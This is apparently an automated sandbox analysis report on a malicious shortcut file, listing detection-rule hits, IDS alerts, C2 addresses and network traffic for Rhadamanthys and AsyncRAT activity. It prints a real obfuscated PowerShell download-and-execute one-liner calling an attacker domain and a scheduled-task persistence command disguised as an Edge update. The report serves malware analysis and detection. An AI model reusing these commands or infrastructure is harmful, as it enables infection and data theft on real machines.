Author: Florian Roth (Nextron Systems): Data: Command: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\ajbs50ul.bat" , ParentImage: C:\Users\Public\ajbs50ul.bat, ParentProcessId: 5344, ParentProcessName: ajbs50ul.bat, ProcessCommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", ProcessId: 7104, ProcessName: powershell.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 185.196.9.174, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 5436, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 55203

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5560, TargetFilename: C:\Users\Public\ajbs50ul.bat

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5560, TargetFilename: C:\Users\Public\ajbs50ul.bat

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 46.29.238.96, DestinationIsIpv6: false, DestinationPort: 4872, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 4676, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 55201

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\ajbs50ul.bat" , CommandLine: "C:\Users\Public\ajbs50ul.bat" , CommandLine|base64offset|contains: , Image: C:\Users\Public\ajbs50ul.bat, NewProcessName: C:\Users\Public\ajbs50ul.bat, OriginalFileName: C:\Users\Public\ajbs50ul.bat, ParentCommandLine: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\ajbs50ul.bat" , ProcessId: 5344, ProcessName: ajbs50ul.bat

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.196.9.174, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 5436, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 55203

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5560, TargetFilename: C:\Users\Public\ajbs50ul.bat

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini, CommandLine: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini, ProcessId: 2976, ProcessName: regsvr32.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, CommandLine: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, CommandLine|base64offset|contains: o`, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1992, ParentProcessName: cmd.exe, ProcessCommandLine: p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit, ProcessId: 5560, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\ajbs50ul.bat" , ParentImage: C:\Users\Public\ajbs50ul.bat, ParentProcessId: 5344, ParentProcessName: ajbs50ul.bat, ProcessCommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", ProcessId: 7104, ProcessName: powershell.exe

Suricata Signatures

ETPRO JA3 HASH Suspected Malware Related Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:52:40.631445+0200	2854824	2	Potentially Bad Traffic	147.45.126.71	3752	192.168.2.8	49717	TCP
2024-10-08T20:52:50.679436+0200	2854824	2	Potentially Bad Traffic	147.45.126.71	3752	192.168.2.8	49718	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:53:17.791891+0200	2842478	1	Malware Command and Control Activity Detected	185.196.9.174	7777	192.168.2.8	55203	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:52:30.208812+0200	2854802	1	Domain Observed Used for C2 Detected	147.45.126.71	3752	192.168.2.8	49716	TCP
2024-10-08T20:52:40.631445+0200	2854802	1	Domain Observed Used for C2 Detected	147.45.126.71	3752	192.168.2.8	49717	TCP
2024-10-08T20:52:50.679436+0200	2854802	1	Domain Observed Used for C2 Detected	147.45.126.71	3752	192.168.2.8	49718	TCP
2024-10-08T20:53:33.701983+0200	2854802	1	Domain Observed Used for C2 Detected	46.29.238.96	4872	192.168.2.8	55220	TCP
2024-10-08T20:54:12.216580+0200	2854802	1	Domain Observed Used for C2 Detected	46.29.238.96	4872	192.168.2.8	59236	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\ajbs50ul.bat	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Gga6.ini	ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: fBcMVl6ns6.lnk

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: fBcMVl6ns6.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:55200 version: TLS 1.2

Source:	Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2740F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,		4_2_00007FF63D2740F0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04040F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,		18_2_00007FF7F04040F0

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft	Jump to behavior

Source: C:\Windows\System32\rekeywiz.exe

Code function: 4x nop then dec esp

18_2_000002A4ACB55641

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49716
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49717
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49718
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.8:55203
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.8:55220
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.8:59236

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 185.196.9.174 7777

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm

Source: unknown

Network traffic detected: IP country count 14

Source: global traffic	TCP traffic: 192.168.2.8:49709 -> 130.133.110.14:33445
Source: global traffic	TCP traffic: 192.168.2.8:49710 -> 194.249.212.109:33445
Source: global traffic	TCP traffic: 192.168.2.8:49716 -> 147.45.126.71:3752
Source: global traffic	TCP traffic: 192.168.2.8:55201 -> 46.29.238.96:4872
Source: global traffic	TCP traffic: 192.168.2.8:55203 -> 185.196.9.174:7777
Source: global traffic	TCP traffic: 192.168.2.8:55212 -> 104.223.122.15:3389
Source: global traffic	TCP traffic: 192.168.2.8:55213 -> 51.254.84.212:33445
Source: global traffic	TCP traffic: 192.168.2.8:55215 -> 185.58.206.164:33445
Source: global traffic	TCP traffic: 192.168.2.8:55216 -> 195.93.190.6:33445
Source: global traffic	TCP traffic: 192.168.2.8:55218 -> 95.215.44.78:3389
Source: global traffic	TCP traffic: 192.168.2.8:55219 -> 163.172.136.118:3389
Source: global traffic	TCP traffic: 192.168.2.8:55222 -> 37.97.185.116:33445
Source: global traffic	TCP traffic: 192.168.2.8:55223 -> 80.87.193.193:3389
Source: global traffic	TCP traffic: 192.168.2.8:55224 -> 46.229.52.198:33445
Source: global traffic	TCP traffic: 192.168.2.8:55225 -> 85.21.144.224:33445
Source: global traffic	TCP traffic: 192.168.2.8:55226 -> 37.187.122.30:3389
Source: global traffic	TCP traffic: 192.168.2.8:55227 -> 205.185.116.116:33445
Source: global traffic	TCP traffic: 192.168.2.8:55228 -> 198.98.51.198:3389
Source: global traffic	TCP traffic: 192.168.2.8:55229 -> 104.233.104.126:33445
Source: global traffic	TCP traffic: 192.168.2.8:55233 -> 148.251.23.146:2306
Source: global traffic	TCP traffic: 192.168.2.8:55235 -> 193.124.186.205:33445
Source: global traffic	UDP traffic: 192.168.2.8:33445 -> 85.130.224.235:33445

Source: global traffic

TCP traffic: 192.168.2.8:55198 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.8:49717
Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.8:49718

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D277D80 WSARecv,WSAGetLastError,

4_2_00007FF63D277D80

Source: global traffic	HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: 1h982d.bemostake.space
Source: global traffic	DNS traffic detected: DNS query: bemostake.space
Source: global traffic	DNS traffic detected: DNS query: rocketdocs.lol

Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6106000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC61FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bemostake.space
Source: powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rocketdocs.lol
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000013.00000002.2125075305.000002403AAD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.$
Source: powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.w
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1h982d.bemostake.space/test.txt
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1h982d.bp24mostakp24.spacp24/tp24st.txt
